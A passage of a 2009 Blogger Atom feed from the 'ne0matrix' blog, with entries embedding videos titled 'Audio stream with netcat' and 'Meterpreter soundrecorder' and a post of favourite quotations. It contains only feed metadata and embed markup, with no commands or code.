[video]'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-7150524065565925112</id><published>2009-04-26T23:51:00.002+02:00</published><updated>2009-04-26T23:59:48.954+02:00</updated><title type='text'>Audio stream with netcat [video]</title><content type='html'>&lt;embed src="http://blip.tv/play/Afz9XY33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7150524065565925112?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/7150524065565925112/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/audio-stream-with-netcat.html#comment-form' title='3 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7150524065565925112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7150524065565925112'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/audio-stream-with-netcat.html' title='Audio stream with netcat [video]'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-8769137475112586949</id><published>2009-04-26T23:47:00.004+02:00</published><updated>2009-04-27T00:00:26.059+02:00</updated><title type='text'>Meterpreter soundrecorder [video]</title><content type='html'>&lt;embed src="http://blip.tv/play/Afz3DI33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8769137475112586949?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/8769137475112586949/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/meterpreter-soundrecorder.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8769137475112586949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8769137475112586949'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/meterpreter-soundrecorder.html' title='Meterpreter soundrecorder [video]'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-4950551253458793277</id><published>2009-04-26T22:30:00.000+02:00</published><updated>2009-04-26T22:32:32.753+02:00</updated><title type='text'>Favorite quotations</title><content type='html'>&lt;span style="color:#ffffff;"&gt;COURAGE is not the ability to be fearless, but the ability to act in spite of fear.&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;Better to fight for something than to live for nothing.&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#ffffff;"&gt;(Gen. G.S. Patton)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-4950551253458793277?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/4950551253458793277/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/favorite-quotations.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/4950551253458793277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/4950551253458793277'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/favorite-quotations.html' title='Favorite quotations'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
